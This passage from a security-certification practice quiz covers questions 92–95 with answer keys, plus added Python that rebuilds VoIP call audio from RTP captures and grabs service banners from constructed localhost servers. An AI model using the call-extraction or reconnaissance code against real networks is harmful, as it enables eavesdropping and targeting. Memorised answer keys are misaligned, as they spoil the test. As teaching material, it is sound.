The remaining answers do not perform the task listed.
Black Widow copies websites to your system for later review.
Netcat can be used for all sorts of things but is mostly known for its use in creating backdoor access to compromised systems.
Nmap is probably the best-known port scanner in the world.
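What a tool like Cain actually does with a VoIP capture is mechanical: pick the RTP packets out of the UDP traffic, group them by SSRC (one stream per direction of the call), put them back in sequence order, decode the codec payload and write audio. The following is an added example that walks through those steps for G.711 mu-law (RTP payload type 0); it is not Cain's code and not part of the original quiz. The capture is constructed inline (a handful of hand-built RTP packets, a duplicate, a PCMA stream and a SIP message, as they might be pulled from a pcap) so it runs offline.

```python
import io
import struct
import wave


def parse_rtp(payload):
    """Parse an RTP packet (RFC 3550). Returns (ssrc, seq, timestamp, payload_type, audio)
    or None if the bytes are not RTP (e.g. a SIP signalling message on the same subnet)."""
    if len(payload) < 12:
        return None
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", payload[:12])
    if b0 >> 6 != 2:                       # RTP version must be 2
        return None
    offset = 12 + 4 * (b0 & 0x0F)          # skip the CSRC list
    if b0 & 0x10:                          # header extension present
        if len(payload) < offset + 4:
            return None
        ext_words = struct.unpack("!H", payload[offset + 2:offset + 4])[0]
        offset += 4 + 4 * ext_words
    audio = payload[offset:]
    if b0 & 0x20 and audio and audio[-1]:  # padding: last byte holds the pad length
        audio = audio[:-audio[-1]]
    return ssrc, seq, ts, b1 & 0x7F, audio


def ulaw_to_pcm16(data):
    """Decode G.711 mu-law bytes to little-endian signed 16-bit PCM."""
    out = bytearray()
    for u in data:
        u = ~u & 0xFF
        sign, exp, mant = u & 0x80, (u >> 4) & 0x07, u & 0x0F
        sample = (((mant << 3) + 0x84) << exp) - 0x84
        out += struct.pack("<h", -sample if sign else sample)
    return bytes(out)


def extract_streams(udp_payloads):
    """Group RTP packets by SSRC (one per direction of a call), put them in sequence
    order, drop duplicates, and decode PCMU (payload type 0) to PCM.
    Caveat: sorting by raw sequence number ignores 16-bit wraparound; long calls need
    wrap handling, and other codecs (PCMA = PT 8, G.729, ...) need their own decoders."""
    by_ssrc = {}
    for p in udp_payloads:
        parsed = parse_rtp(p)
        if parsed is None:
            continue
        ssrc, seq, _ts, pt, audio = parsed
        if pt != 0:
            continue
        by_ssrc.setdefault(ssrc, {})[seq] = audio   # keyed by seq, so retransmits collapse
    return {ssrc: ulaw_to_pcm16(b"".join(pkts[s] for s in sorted(pkts)))
            for ssrc, pkts in by_ssrc.items()}


def to_wav(pcm16, rate=8000):
    """Wrap mono 16-bit PCM in a WAV container (8 kHz is the G.711 sample rate)."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(pcm16)
    return buf.getvalue()


# --- constructed capture: UDP payloads as they might be pulled from a pcap ---------

def build_rtp(ssrc, seq, ts, audio, pt=0):
    """Build a minimal RTP packet (V=2, no padding/extension/CSRC, marker clear)."""
    return struct.pack("!BBHII", 0x80, pt, seq, ts, ssrc) + audio


SAMPLE_CAPTURE = [
    build_rtp(0x1111, 2, 320, bytes([0xFF] * 160)),      # caller, arrives before seq 1
    build_rtp(0x1111, 1, 160, bytes([0x80] * 160)),      # caller, 0x80 = loudest positive
    build_rtp(0x1111, 2, 320, bytes([0xFF] * 160)),      # duplicate of seq 2
    build_rtp(0x2222, 10, 800, bytes([0x00] * 160)),     # callee, 0x00 = loudest negative
    build_rtp(0x2222, 11, 960, bytes([0xFF] * 160)),     # 0xFF = silence (sample 0)
    build_rtp(0x3333, 5, 0, bytes([0xD5] * 160), pt=8),  # PCMA stream, skipped here
    b"INVITE sip:bob@example.com SIP/2.0\r\n",           # SIP signalling, not RTP
]


if __name__ == "__main__":
    for ssrc, pcm in extract_streams(SAMPLE_CAPTURE).items():
        print(f"ssrc {ssrc:#x}: {len(pcm) // 2} samples, {len(to_wav(pcm))} WAV bytes")
```

Each SSRC yields one WAV file, so a two-party call comes out as two files (one per direction). On a real capture you would feed this the UDP payloads from a pcap reader; the SIP/SDP exchange that set up the call tells you which ports and payload types to expect.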
Question 92 of 100
92. Question
Which of the following tools is useful in banner grabbing?
Correct answer:
Telnet is correct. Banner grabbing is one of the easiest enumeration methods: connect to an open port and see what, if any, default message (banner) the service returns. Telnet gives you a raw TCP connection for this. Run telnet IPADDRESS 80 (where IPADDRESS is the address of your target and 80 is the HTTP port), then type a request such as HEAD / HTTP/1.0 followed by a blank line; the Server header in the response identifies the web server software. Some services (SSH, FTP, SMTP) send their banner as soon as you connect, without any request at all. Most other scanning tools (netcat, nmap, and so on) can also grab banners.
Incorrect answers:
Nslookup is for DNS queries.
Traceroute is for path mapping.
AngryIP is a host discovery tool.
Silica is used for wireless discovery.
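The telnet session above done programmatically, as an added example that is not part of the original quiz: it connects to a port, waits briefly for a service that announces itself (SSH, FTP, SMTP), and otherwise sends an HTTP HEAD probe and reads the reply, then pulls out the Server header. Because a real target would not be reachable offline, the block starts two constructed lab services on localhost (an HTTP server whose "Apache/2.4.41" banner and an SSH-style greeting are both made up for the demo).

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Probe for services that stay silent until spoken to (HTTP). The Host value is a placeholder.
HTTP_PROBE = b"HEAD / HTTP/1.0\r\nHost: target\r\n\r\n"


def grab_banner(host, port, probe=HTTP_PROBE, passive_wait=0.5, timeout=3.0):
    """Connect to host:port and return whatever the service says about itself.

    First wait briefly for a service that talks first (SSH, FTP and SMTP all send a
    greeting on connect); if nothing arrives, send the probe and read the reply.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(passive_wait)
        data = b""
        try:
            data = s.recv(1024)
        except socket.timeout:
            pass
        if not data and probe:
            s.sendall(probe)
            s.settimeout(timeout)
            chunks = []
            try:
                while True:
                    chunk = s.recv(4096)
                    if not chunk:            # server closed the connection
                        break
                    chunks.append(chunk)
            except socket.timeout:
                pass
            data = b"".join(chunks)
    return data.decode("latin-1", errors="replace")


def server_header(banner):
    """Pull the Server: value out of an HTTP response, or None if there is none."""
    for line in banner.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


# --- constructed lab targets so the example runs offline ---------------------------

class _LabHandler(BaseHTTPRequestHandler):
    server_version = "Apache/2.4.41"    # constructed banner, not a real host
    sys_version = ""

    def do_HEAD(self):
        self.send_response(200)         # adds Server: and Date: headers automatically
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, *args):        # keep the demo quiet
        pass


def start_http_lab():
    """Silent-until-asked service (HTTP) on an ephemeral localhost port; returns the port."""
    srv = HTTPServer(("127.0.0.1", 0), _LabHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1]


def start_chatty_lab(greeting=b"SSH-2.0-OpenSSH_8.2p1\r\n"):
    """Talks-first service: sends a constructed SSH-style greeting on connect; returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(greeting)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    http_port = start_http_lab()
    banner = grab_banner("127.0.0.1", http_port)
    print(banner.splitlines()[0], "| Server:", server_header(banner))
    print(grab_banner("127.0.0.1", start_chatty_lab()).strip())
```

Two practical caveats: a Server header can be removed or faked by the administrator, so treat a banner as a hint to be confirmed with nmap -sV or a vulnerability scanner, and the passive wait is what makes one function work for both kinds of service; without it an HTTP probe sent to an SSH port just gets the SSH greeting followed by a protocol error.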
Question 93 of 100
93. Question
A pen test member has gained access to a facility. She positions herself beside a partition wall in such a way that the screen activity of an employee is clearly viewable. Which social engineering attack is this?
Correct answer:
Shoulder surfing is correct. Shoulder surfing occurs when an attacker positions themselves behind or beside an authorized user (here, next to a partition wall) and watches their screen activity.
Incorrect answers:
Impersonation occurs when an attacker pretends to be a person of authority.
Tailgating occurs when the attacker uses a fake badge and follows employees through an open door, whereas piggybacking does not involve the use of a badge of any sort.
Question 94 of 100
94. Question
Which of the following is a suite of IETF specifications for securing certain kinds of information provided by DNS?
Correct answer:
DNSSEC is correct. The Domain Name System Security Extensions (DNSSEC) were first specified in the late 1990s (RFC 2535, 1999; the current specifications are RFC 4033 through 4035) to give DNS clients origin authentication of DNS data and data integrity: records are signed, so a validating resolver can verify that an answer really came from the zone owner and was not altered in transit. DNSSEC is a suite of IETF specifications for securing certain kinds of information provided by DNS. Note that it provides no confidentiality; responses are signed, not encrypted. Dan Kaminsky's 2008 cache-poisoning research made DNS vulnerabilities widely known, and since then many service providers have been rolling this extension out so that DNS results are cryptographically protected.
Incorrect answers:
ITSEC is not a DNS specification; the name belongs to the European Information Technology Security Evaluation Criteria. (Transport and tunnel modes are features of IPsec, which protects IP traffic, not DNS data.)
Recursive DNS refers to the process a DNS server takes in looking up a name (recursive DNS name servers are responsible for providing the proper IP address of the intended domain name to the requesting host).
Split DNS occurs when you create two zones for the same domain namespace, one for internal and one for external use.
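The origin authentication DNSSEC gives rests on a chain of trust: each zone's key signing key (DNSKEY) is vouched for by a DS record in the parent zone, and a validating resolver checks that the DS it got from the (signed) parent matches the DNSKEY the child serves. The following added example, not part of the original quiz, shows that step with nothing but the standard library: the canonical owner-name encoding, the RFC 4034 key tag, the DS digest, and the resolver-side comparison, including what happens when an attacker substitutes a key. The key material is constructed (64 arbitrary bytes standing in for an ECDSA P-256 public key, algorithm 13) and signs nothing; full RRSIG verification on top of this needs a crypto library and is not shown.

```python
import hashlib
import struct


def name_to_wire(name):
    """Owner name in canonical wire form (RFC 4034 section 6.2): lowercase,
    length-prefixed labels, terminated by the zero-length root label."""
    name = name.rstrip(".").lower()
    labels = [label for label in name.split(".") if label]
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"


def dnskey_rdata(flags, protocol, algorithm, public_key):
    """DNSKEY RDATA: flags (257 = KSK, 256 = ZSK), protocol (always 3), algorithm, key bytes."""
    return struct.pack("!HBB", flags, protocol, algorithm) + public_key


def key_tag(rdata):
    """Key tag from RFC 4034 Appendix B (valid for every algorithm except RSA/MD5)."""
    ac = 0
    for i, b in enumerate(rdata):
        ac += (b << 8) if i % 2 == 0 else b
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF


DS_DIGESTS = {1: hashlib.sha1, 2: hashlib.sha256, 4: hashlib.sha384}


def ds_digest(owner, rdata, digest_type=2):
    """DS digest (RFC 4034 section 5.1.4): H(canonical owner name || DNSKEY RDATA)."""
    return DS_DIGESTS[digest_type](name_to_wire(owner) + rdata).hexdigest().upper()


def make_ds(owner, rdata, digest_type=2):
    """The DS record a parent zone publishes for a child's key signing key:
    (key tag, algorithm, digest type, digest)."""
    return (key_tag(rdata), rdata[3], digest_type, ds_digest(owner, rdata, digest_type))


def ds_matches(parent_ds, owner, rdata):
    """The check a validating resolver does at a zone cut: the DS from the signed parent
    must match the child's DNSKEY by key tag, algorithm and digest. A mismatch means the
    key is not authorised by the parent and the chain of trust stops there."""
    tag, alg, dtype, digest = parent_ds
    return (tag == key_tag(rdata) and alg == rdata[3]
            and ds_digest(owner, rdata, dtype) == digest.upper())


# Constructed key material: 64 arbitrary bytes in place of a real ECDSA P-256 public key.
FAKE_KSK_PUBLIC = bytes(range(64))
EXAMPLE_KSK = dnskey_rdata(257, 3, 13, FAKE_KSK_PUBLIC)


def demo():
    owner = "example.com."
    parent_ds = make_ds(owner, EXAMPLE_KSK)        # what the .com zone would publish
    # An attacker who poisons the child's DNSKEY answer with their own key (one byte changed
    # here) fails the DS check, so nothing signed with it will validate.
    substituted = dnskey_rdata(257, 3, 13, b"\xff" + FAKE_KSK_PUBLIC[1:])
    return {
        "ds": parent_ds,
        "genuine_key_ok": ds_matches(parent_ds, owner, EXAMPLE_KSK),
        "substituted_key_ok": ds_matches(parent_ds, owner, substituted),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The same arithmetic is what dnssec-dsfromkey or a registrar's DS generator performs; the point for the exam is that the parent never signs the child's key directly, it publishes a hash of it, and every resolver recomputes that hash on the key it actually received.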
Question 95 of 100
95. Question
Which of the following tools is the best option for rooting an Android device?
Correct answer:
SuperOneClick is correct. SuperOneClick is designed for rooting Android devices.
Incorrect answers:
All other answers are incorrect. Each of those options is designed for use on iOS devices.